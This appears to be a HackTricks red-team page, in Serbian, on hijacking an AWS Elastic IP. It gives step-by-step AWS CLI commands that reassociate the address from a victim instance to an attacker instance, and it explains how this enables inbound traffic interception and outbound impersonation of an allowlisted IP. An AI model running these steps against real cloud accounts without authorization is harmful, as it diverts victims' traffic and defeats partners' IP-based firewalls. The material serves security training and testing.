AWS - Elastic IP Hijack for Ingress/Egress IP Impersonation

Tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

• Proverite planove pretplate!
• Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
• Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.

Sažetak

Zloupotrebite ec2:AssociateAddress (i opciono ec2:DisassociateAddress) da ponovo povežete Elastic IP (EIP) sa žrtvine instance/ENI na napadačevu instancu/ENI. Ovo preusmerava dolazni saobraćaj namenjen EIP-u ka napadaču i takođe omogućava napadaču da inicira odlazni saobraćaj sa allowlisted javnom IP adresom kako bi zaobišao external partner firewalls.

Preduslovi

• ID alokacije ciljnog EIP-a u istom nalogu/VPC.
• Napadačka instanca/ENI pod vašom kontrolom.
• Dozvole:
• ec2:DescribeAddresses
• ec2:AssociateAddress na EIP allocation-id i na napadačkoj instanci/ENI
• ec2:DisassociateAddress (opciono). Napomena: --allow-reassociation će automatski disassociate-ovati od prethodnog attachment-a.

Napad

Promenljive

REGION=us-east-1
ATTACKER_INSTANCE=<i-attacker>
VICTIM_INSTANCE=<i-victim>

1. Dodelite ili identifikujte EIP žrtve (laboratorija dodeljuje novi i prikači ga žrtvi)

ALLOC_ID=$(aws ec2 allocate-address --domain vpc --region $REGION --query AllocationId --output text)
aws ec2 associate-address --allocation-id $ALLOC_ID --instance-id $VICTIM_INSTANCE --region $REGION
EIP=$(aws ec2 describe-addresses --allocation-ids $ALLOC_ID --region $REGION --query Addresses[0].PublicIp --output text)

2. Proverite da li se EIP trenutno usmerava na ciljni servis (npr. provere za banner)

curl -sS http://$EIP | grep -i victim

3. Ponovo pridružite EIP napadaču (automatski se odspaja od žrtve)

aws ec2 associate-address --allocation-id $ALLOC_ID --instance-id $ATTACKER_INSTANCE --allow-reassociation --region $REGION

4. Proverite da li EIP sada pokazuje na attacker service

sleep 5; curl -sS http://$EIP | grep -i attacker

Dokazi (premeštena asocijacija):

aws ec2 describe-addresses --allocation-ids $ALLOC_ID --region $REGION \
--query Addresses[0].AssociationId --output text

Uticaj

• Inbound impersonation: Sav saobraćaj ka otetom EIP-u se isporučuje na napadačevu instancu/ENI.
• Outbound impersonation: Napadač može inicirati saobraćaj koji izgleda kao da potiče od allowlisted javne IP adrese (korisno za zaobilaženje partner/spoljnih filtera po IP adresi izvora).

Tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

• Proverite planove pretplate!
• Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
• Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.